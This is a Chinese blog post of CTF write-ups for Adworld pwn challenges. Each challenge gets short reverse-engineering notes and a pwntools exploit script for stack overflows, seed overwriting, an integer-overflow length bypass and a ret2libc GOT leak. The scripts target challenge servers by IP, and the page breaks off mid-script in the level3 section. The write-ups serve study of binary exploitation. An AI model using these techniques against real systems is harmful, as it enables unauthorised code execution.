<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 3.9.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/blog/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/blog/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/blog/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/blog/images/logo.svg" color="#222">

<link rel="stylesheet" href="/blog/css/main.css">


<link rel="stylesheet" href="/blog/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"yoursite.com","root":"/blog/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":true,"show_result":true,"style":"mac"},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="pwnlevel2">
<meta name="keywords" content="攻防世界,Adworld">
<meta property="og:type" content="article">
<meta property="og:title" content="攻防世界CTF-WriteUp">
<meta property="og:url" content="http://yoursite.com/2020/04/25/攻防世界CTF-WriteUp/index.html">
<meta property="og:site_name" content="Sncker&#39;s blog - qq948375961">
<meta property="og:description" content="pwnlevel2">
<meta property="og:locale" content="zh-CN">
<meta property="og:image" content="https://gitee.com/sncker/resource/raw/master/image/20200425185019.png">
<meta property="og:image" content="https://gitee.com/sncker/resource/raw/master/image/20200425185138.png">
<meta property="og:image" content="https://gitee.com/sncker/resource/raw/master/image/20200425185155.png">
<meta property="og:image" content="https://gitee.com/sncker/resource/raw/master/image/20200425185409.png">
<meta property="og:image" content="https://gitee.com/sncker/resource/raw/master/image/20200425185541.png">
<meta property="og:image" content="https://gitee.com/sncker/resource/raw/master/image/20200425185947.png">
<meta property="og:image" content="https://gitee.com/sncker/resource/raw/master/image/20200425191430.png">
<meta property="og:image" content="https://gitee.com/sncker/resource/raw/master/image/20200425192101.png">
<meta property="og:image" content="https://gitee.com/sncker/resource/raw/master/image/20200425192400.png">
<meta property="og:image" content="https://gitee.com/sncker/resource/raw/master/image/20200425192432.png">
<meta property="og:image" content="https://gitee.com/sncker/resource/raw/master/image/20200425192507.png">
<meta property="og:image" content="https://gitee.com/sncker/resource/raw/master/image/20200425194729.png">
<meta property="og:image" content="https://gitee.com/sncker/resource/raw/master/image/20200425195016.png">
<meta property="og:image" content="https://gitee.com/sncker/resource/raw/master/image/20200425195205.png">
<meta property="og:image" content="https://gitee.com/sncker/resource/raw/master/image/20200425195238.png">
<meta property="og:image" content="https://gitee.com/sncker/resource/raw/master/image/20200425195404.png">
<meta property="og:image" content="https://gitee.com/sncker/resource/raw/master/image/20200425195854.png">
<meta property="og:image" content="https://gitee.com/sncker/resource/raw/master/image/20200425200119.png">
<meta property="og:image" content="https://gitee.com/sncker/resource/raw/master/image/20200425200651.png">
<meta property="og:image" content="https://gitee.com/sncker/resource/raw/master/image/20200425200715.png">
<meta property="og:image" content="https://gitee.com/sncker/resource/raw/master/image/20200425200937.png">
<meta property="og:image" content="https://gitee.com/sncker/resource/raw/master/image/20200425200957.png">
<meta property="og:image" content="https://gitee.com/sncker/resource/raw/master/image/20200425201254.png">
<meta property="og:image" content="https://gitee.com/sncker/resource/raw/master/image/20200501135353.png">
<meta property="og:image" content="https://gitee.com/sncker/resource/raw/master/image/20200501135916.png">
<meta property="og:image" content="https://gitee.com/sncker/resource/raw/master/image/20200501140321.png">
<meta property="og:image" content="https://gitee.com/sncker/resource/raw/master/image/20200501140724.png">
<meta property="og:image" content="https://gitee.com/sncker/resource/raw/master/image/20200501142119.png">
<meta property="og:image" content="https://gitee.com/sncker/resource/raw/master/image/20200501142622.png">
<meta property="og:image" content="https://gitee.com/sncker/resource/raw/master/image/20200501143254.png">
<meta property="og:updated_time" content="2020-05-01T06:50:49.345Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="攻防世界CTF-WriteUp">
<meta name="twitter:description" content="pwnlevel2">
<meta name="twitter:image" content="https://gitee.com/sncker/resource/raw/master/image/20200425185019.png">

<link rel="canonical" href="http://yoursite.com/2020/04/25/攻防世界CTF-WriteUp/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>攻防世界CTF-WriteUp | Sncker's blog - qq948375961</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/blog/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">Sncker's blog - qq948375961</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">情绪不稳定，要做就做大事情。</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/blog/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/blog/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/blog/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2020/04/25/攻防世界CTF-WriteUp/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="http://q1.qlogo.cn/g?b=qq&nk=948375961&s=640">
      <meta itemprop="name" content="SNCKER">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Sncker's blog - qq948375961">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          攻防世界CTF-WriteUp
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2020-04-25 18:44:00" itemprop="dateCreated datePublished" datetime="2020-04-25T18:44:00+08:00">2020-04-25</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2020-05-01 14:50:49" itemprop="dateModified" datetime="2020-05-01T14:50:49+08:00">2020-05-01</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/blog/categories/CTF/" itemprop="url" rel="index"><span itemprop="name">CTF</span></a>
                </span>
                  ，
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/blog/categories/CTF/WriteUp/" itemprop="url" rel="index"><span itemprop="name">WriteUp</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="pwn"><a href="#pwn" class="headerlink" title="pwn"></a>pwn</h1><h2 id="level2"><a href="#level2" class="headerlink" title="level2"></a>level2</h2><p><img src="https://gitee.com/sncker/resource/raw/master/image/20200425185019.png" alt></p>
<a id="more"></a>
<p>IDA分析<br><img src="https://gitee.com/sncker/resource/raw/master/image/20200425185138.png" alt><br><img src="https://gitee.com/sncker/resource/raw/master/image/20200425185155.png" alt><br>很明显的溢出，而且还调用了system，看汇编。<br><img src="https://gitee.com/sncker/resource/raw/master/image/20200425185409.png" alt><br>拿到call_system的地址，然后shift+f12也找到了bin_sh。<br><img src="https://gitee.com/sncker/resource/raw/master/image/20200425185541.png" alt><br>脚本</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">r = process(<span class="string">"level2"</span>)</span><br><span class="line"><span class="comment">#r = remote("159.138.137.79", 63180)</span></span><br><span class="line">context(log_level=<span class="string">"debug"</span>, arch=<span class="string">"i386"</span>, os=<span class="string">"linux"</span>)</span><br><span class="line"></span><br><span class="line">r.recvuntil(<span class="string">"Input:"</span>)</span><br><span class="line">call_system_addr = <span class="number">0x0804845C</span></span><br><span class="line">bin_sh_addr = <span class="number">0x0804A024</span></span><br><span class="line">payload = <span class="string">'a'</span>*<span class="number">0x8c</span> + p32(call_system_addr) + p32(bin_sh_addr)</span><br><span class="line">r.send(payload)</span><br><span class="line"></span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>

<h2 id="guess-num"><a href="#guess-num" class="headerlink" title="guess_num"></a>guess_num</h2><p><img src="https://gitee.com/sncker/resource/raw/master/image/20200425185947.png" alt><br>保护全开了，IDA分析。<br>main反汇编  </p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><span class="line">__int64 __<span class="function">fastcall <span class="title">main</span><span class="params">(__int64 a1, <span class="keyword">char</span> **a2, <span class="keyword">char</span> **a3)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  FILE *v3; <span class="comment">// rdi</span></span><br><span class="line">  <span class="keyword">int</span> v5; <span class="comment">// [rsp+4h] [rbp-3Ch]</span></span><br><span class="line">  <span class="keyword">int</span> i; <span class="comment">// [rsp+8h] [rbp-38h]</span></span><br><span class="line">  <span class="keyword">int</span> v7; <span class="comment">// [rsp+Ch] [rbp-34h]</span></span><br><span class="line">  <span class="keyword">char</span> v8; <span class="comment">// [rsp+10h] [rbp-30h]</span></span><br><span class="line">  <span class="keyword">unsigned</span> <span class="keyword">int</span> seed[<span class="number">2</span>]; <span class="comment">// [rsp+30h] [rbp-10h]</span></span><br><span class="line">  <span class="keyword">unsigned</span> __int64 v10; <span class="comment">// [rsp+38h] [rbp-8h]</span></span><br><span class="line"></span><br><span class="line">  v10 = __readfsqword(<span class="number">0x28</span>u);</span><br><span class="line">  setbuf(<span class="built_in">stdin</span>, <span class="number">0L</span>L);</span><br><span class="line">  setbuf(<span class="built_in">stdout</span>, <span class="number">0L</span>L);</span><br><span class="line">  v3 = <span class="built_in">stderr</span>;</span><br><span class="line">  setbuf(<span class="built_in">stderr</span>, <span class="number">0L</span>L);</span><br><span class="line">  v5 = <span class="number">0</span>;</span><br><span class="line">  v7 = <span class="number">0</span>;</span><br><span class="line">  *(_QWORD *)seed = sub_BB0(v3, <span class="number">0L</span>L);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">"-------------------------------"</span>);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">"Welcome to a guess number game!"</span>);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">"-------------------------------"</span>);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">"Please let me know your name!"</span>);</span><br><span class="line">  <span class="built_in">printf</span>(<span class="string">"Your name:"</span>);</span><br><span class="line">  gets(&amp;v8);</span><br><span class="line">  srand(seed[<span class="number">0</span>]);</span><br><span class="line">  <span class="keyword">for</span> ( i = <span class="number">0</span>; i &lt;= <span class="number">9</span>; ++i )</span><br><span class="line">  &#123;</span><br><span class="line">    v7 = rand() % <span class="number">6</span> + <span class="number">1</span>;</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">"-------------Turn:%d-------------\n"</span>, (<span class="keyword">unsigned</span> <span class="keyword">int</span>)(i + <span class="number">1</span>));</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">"Please input your guess number:"</span>);</span><br><span class="line">    __isoc99_scanf(<span class="string">"%d"</span>, &amp;v5);</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">"---------------------------------"</span>);</span><br><span class="line">    <span class="keyword">if</span> ( v5 != v7 )</span><br><span class="line">    &#123;</span><br><span class="line">      <span class="built_in">puts</span>(<span class="string">"GG!"</span>);</span><br><span class="line">      <span class="built_in">exit</span>(<span class="number">1</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">"Success!"</span>);</span><br><span class="line">  &#125;</span><br><span class="line">  sub_C3E();</span><br><span class="line">  <span class="keyword">return</span> <span class="number">0L</span>L;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>sub_C3E()是cat flag的。<br>这题就是生成随机数，然后用户猜，猜对10次就可以了。<br>学过C都知道rand()是伪随机数，只要能控制随机数种子，那么随机数就能预测。   </p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">char</span> v8; <span class="comment">// [rsp+10h] [rbp-30h]</span></span><br><span class="line"><span class="keyword">unsigned</span> <span class="keyword">int</span> seed[<span class="number">2</span>]; <span class="comment">// [rsp+30h] [rbp-10h]</span></span><br><span class="line">.</span><br><span class="line">.</span><br><span class="line"><span class="built_in">printf</span>(<span class="string">"Your name:"</span>);</span><br><span class="line">gets(&amp;v8);</span><br></pre></td></tr></table></figure>

<p>名字输入处用了gets函数，因此可以溢出。看局部变量声明顺序，名字变量填充0x20字节即可溢出覆盖到种子变量seed。<br>用ldd命令查看程序链接库路径。<br><img src="https://gitee.com/sncker/resource/raw/master/image/20200425191430.png" alt><br>然后固定一个种子值，边调用libc的rand()生成随机数边发送即可。（若远端库版本不一样，虽然固定种子值，但生成的随机数也可能不一样，所以打pwn要尽可能地模拟出和远端一样的环境）<br>脚本  </p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> ctypes <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">so = CDLL(<span class="string">"/lib/x86_64-linux-gnu/libc.so.6"</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">#r = process("guess_num")</span></span><br><span class="line">r = remote(<span class="string">"159.138.137.79"</span>, <span class="number">59240</span>)</span><br><span class="line">context(log_level=<span class="string">"debug"</span>)</span><br><span class="line">r.recvuntil(<span class="string">"Your name:"</span>)</span><br><span class="line">payload = <span class="string">'a'</span>*<span class="number">0x20</span> + p64(<span class="number">1</span>)</span><br><span class="line">r.sendline(payload)</span><br><span class="line">so.srand(<span class="number">1</span>)</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">10</span>):</span><br><span class="line">    r.recvuntil(<span class="string">"number:"</span>)</span><br><span class="line">    r.sendline(str(so.rand()%<span class="number">6</span>+<span class="number">1</span>))</span><br><span class="line"></span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>

<h2 id="int-overflow"><a href="#int-overflow" class="headerlink" title="int_overflow"></a>int_overflow</h2><p><img src="https://gitee.com/sncker/resource/raw/master/image/20200425192101.png" alt><br>main函数<br><img src="https://gitee.com/sncker/resource/raw/master/image/20200425192400.png" alt><br>跟进login函数<br><img src="https://gitee.com/sncker/resource/raw/master/image/20200425192432.png" alt><br>再跟进check_passwd函数<br><img src="https://gitee.com/sncker/resource/raw/master/image/20200425192507.png" alt><br>check_passwd对传入的字符串进行判断，只要长度在[4,8]之间就会将字符串复制到dest变量。<br>这里很明显，密码字符串的buf长度远大于dest变量，因此可以造成溢出。<br>然后考虑的就是绕过长度限制，v3是字符串长度，它是无符号8位整型，数值范围是0~255，结合题目名字可以知道当v3大于255的时候就会溢出，比如256就会溢出成0,那么[260,264]就可以溢出到[4,8]这个区间。应该不难理解。  </p>
<table>
<thead>
<tr>
<th align="center">8</th>
<th align="center">7</th>
<th align="center">6</th>
<th align="center">5</th>
<th align="center">4</th>
<th align="center">3</th>
<th align="center">2</th>
<th align="center">1</th>
<th align="center">0</th>
<th align="center">十进制</th>
</tr>
</thead>
<tbody><tr>
<td align="center"></td>
<td align="center">1</td>
<td align="center">1</td>
<td align="center">1</td>
<td align="center">1</td>
<td align="center">1</td>
<td align="center">1</td>
<td align="center">1</td>
<td align="center">1</td>
<td align="center">255</td>
</tr>
<tr>
<td align="center">1</td>
<td align="center">0</td>
<td align="center">0</td>
<td align="center">0</td>
<td align="center">0</td>
<td align="center">0</td>
<td align="center">0</td>
<td align="center">0</td>
<td align="center">0</td>
<td align="center">256</td>
</tr>
</tbody></table>
<p>8位无符号整型，有效位0~7，溢出后就为0了。<br>绕过了长度问题，就要想溢出后要劫持程序流到哪。<br>仔细找找发现还漏了一个cat flag的函数。<br><img src="https://gitee.com/sncker/resource/raw/master/image/20200425194729.png" alt><br>直接跳上去就可以了。<br>脚本</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line"><span class="comment">#r = process("int_overflow")</span></span><br><span class="line">r = remote(<span class="string">"159.138.137.79"</span>, <span class="number">60855</span>)</span><br><span class="line">context(log_level=<span class="string">"debug"</span>, arch=<span class="string">"i386"</span>, os=<span class="string">"linux"</span>)</span><br><span class="line"></span><br><span class="line">cat_flag_addr = <span class="number">0x0804868B</span></span><br><span class="line"></span><br><span class="line">r.sendlineafter(<span class="string">"Your choice:"</span>, <span class="string">"1"</span>)</span><br><span class="line">r.sendlineafter(<span class="string">"Please input your username:"</span>, <span class="string">"sncker"</span>)</span><br><span class="line"></span><br><span class="line">payload = <span class="string">'a'</span>*<span class="number">0x18</span> + p32(cat_flag_addr)</span><br><span class="line">payload = payload.ljust(<span class="number">260</span>, <span class="string">'a'</span>)</span><br><span class="line">r.send(payload)</span><br><span class="line"></span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>

<h2 id="cgpwn2"><a href="#cgpwn2" class="headerlink" title="cgpwn2"></a>cgpwn2</h2><p><img src="https://gitee.com/sncker/resource/raw/master/image/20200425195016.png" alt><br>直接贴关键函数。<br><img src="https://gitee.com/sncker/resource/raw/master/image/20200425195205.png" alt><br><img src="https://gitee.com/sncker/resource/raw/master/image/20200425195238.png" alt><br>看着hello函数一堆乱起八糟的东西，直接跑一下程序。<br><img src="https://gitee.com/sncker/resource/raw/master/image/20200425195404.png" alt><br>估计是干扰的。去掉这些干扰的代码，剩下的思路就比较清晰。gets可以溢出了，pwn函数里有call_system的地址。shift+12找bin_sh没找到。仔细看一下发现name是全局变量，那么直接写bin_sh进去就可以了。<br>脚本  </p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line"><span class="comment">#r = process("cgpwn2")</span></span><br><span class="line">r = remote(<span class="string">"159.138.137.79"</span>, <span class="number">51100</span>)</span><br><span class="line">context(log_level=<span class="string">"debug"</span>, arch=<span class="string">"i386"</span>, os=<span class="string">"linux"</span>)</span><br><span class="line"></span><br><span class="line">call_system_addr = <span class="number">0x0804855A</span></span><br><span class="line">p_name = <span class="number">0x0804A080</span></span><br><span class="line"></span><br><span class="line">r.sendlineafter(<span class="string">"name"</span>, <span class="string">"/bin/sh"</span>)</span><br><span class="line">r.sendlineafter(<span class="string">"here:"</span>, <span class="string">'a'</span>*<span class="number">0x26</span> + <span class="string">'a'</span>*<span class="number">0x4</span> + p32(call_system_addr) + p32(p_name))</span><br><span class="line"></span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>

<h2 id="when-did-you-born"><a href="#when-did-you-born" class="headerlink" title="when_did_you_born"></a>when_did_you_born</h2><p><img src="https://gitee.com/sncker/resource/raw/master/image/20200425195854.png" alt><br><img src="https://gitee.com/sncker/resource/raw/master/image/20200425200119.png" alt><br>很清晰的思路，先让v5不等于1926再让v5等于1926，gets的v4可以覆盖到v5。<br>脚本  </p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line"><span class="comment">#r = process("when_did_you_born")</span></span><br><span class="line">r = remote(<span class="string">"159.138.137.79"</span>, <span class="number">62561</span>)</span><br><span class="line">context.log_level = <span class="string">"debug"</span></span><br><span class="line"></span><br><span class="line">r.sendlineafter(<span class="string">"Birth?"</span>, <span class="string">"1999"</span>)</span><br><span class="line">r.sendlineafter(<span class="string">"Name?"</span>, <span class="string">'a'</span>*<span class="number">0x8</span> + p64(<span class="number">1926</span>))</span><br><span class="line"></span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>

<h2 id="hello-pwn"><a href="#hello-pwn" class="headerlink" title="hello_pwn"></a>hello_pwn</h2><p><img src="https://gitee.com/sncker/resource/raw/master/image/20200425200651.png" alt><br>又是简单的覆盖。<br><img src="https://gitee.com/sncker/resource/raw/master/image/20200425200715.png" alt><br>相差4直接填充。  </p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line"><span class="comment">#r = process("hello_pwn")</span></span><br><span class="line">r = remote(<span class="string">"124.126.19.106"</span>, <span class="number">45068</span>)</span><br><span class="line">payload = <span class="string">'a'</span>*<span class="number">4</span> + p64(<span class="number">1853186401</span>)</span><br><span class="line">r.sendafter(<span class="string">"for bof"</span>, payload)</span><br><span class="line"></span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>

<h2 id="level0"><a href="#level0" class="headerlink" title="level0"></a>level0</h2><p><img src="https://gitee.com/sncker/resource/raw/master/image/20200425200937.png" alt><br><img src="https://gitee.com/sncker/resource/raw/master/image/20200425200957.png" alt><br>简单的溢出。平台放题顺序有点问题啊。  </p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line"><span class="comment">#r = process("level0")</span></span><br><span class="line">r = remote(<span class="string">"124.126.19.106"</span>, <span class="number">39454</span>)</span><br><span class="line"></span><br><span class="line">callsystem_addr = <span class="number">0x0000000000400596</span></span><br><span class="line">payload = <span class="string">'a'</span>*<span class="number">0x88</span> + p64(callsystem_addr)</span><br><span class="line">r.sendafter(<span class="string">"World"</span>, payload)</span><br><span class="line"></span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>

<h2 id="level3"><a href="#level3" class="headerlink" title="level3"></a>level3</h2><p>这题给了libc文件，终于要ret2libc了。。。<br><img src="https://gitee.com/sncker/resource/raw/master/image/20200425201254.png" alt><br>虽然有溢出，但是程序里没用system和binsh字符串，只能跳到libc。<br>那么就需要泄露一些库函数的地址，来计算出libc的基址。泄露可以用printf和write这类函数来泄露。这里可以看到在read之前，程序调用过一次write，那么got表里是有write的地址的。所以可以调用write来泄露write的真实地址。  </p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">vul_addr = elf.symbols[<span class="string">"vulnerable_function"</span>]</span><br><span class="line">write_plt = elf.plt[<span class="string">"write"</span>]</span><br><span class="line">write_got = elf.got[<span class="string">"write"</span>]</span><br><span class="line"></span><br><span class="line">payload = <span class="string">'a'</span>*<span class="number">0x8C</span> + p32(write_plt) + p32(vul_addr) + p32(<span class="number">1</span>) + p32(write_got) + p32(<span class="number">4</span>)    <span class="comment">#write(1,write_got,4) 返回地址vul_addr</span></span><br></pre></td></tr></table></figure>

<p>再次跳回vulnerable_function后就是简单的ret2libc了。<br>完整代码  </p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">context.log_level = <span class="string">"debug"</span></span><br><span class="line"></span><br><span class="line">elf = ELF(<span class="string">"level3"</span>)</span><br><span class="line">libc = ELF(<span class="string">"libc_32.so.6"</span>)</span><br><span class="line"></span><br><span class="line">r = process(<span class="string">"level3"</span>)</span><br><span class="line"></span><br><span class="line">vul_addr = elf.symbols[<span class="string">"vulnerable_function"</span>]</span><br><span class="line">write_plt = elf.plt[<span class="string">"write"</span>]</span><br><span class="line">write_got = elf.got[<span class="string">"write"</span>]</span><br><span class="line"></span><br><span class="line">payload = <span class="string">'a'</span>*<span class="number">0x8C</span> + p32(write_plt) + p32(vul_addr) 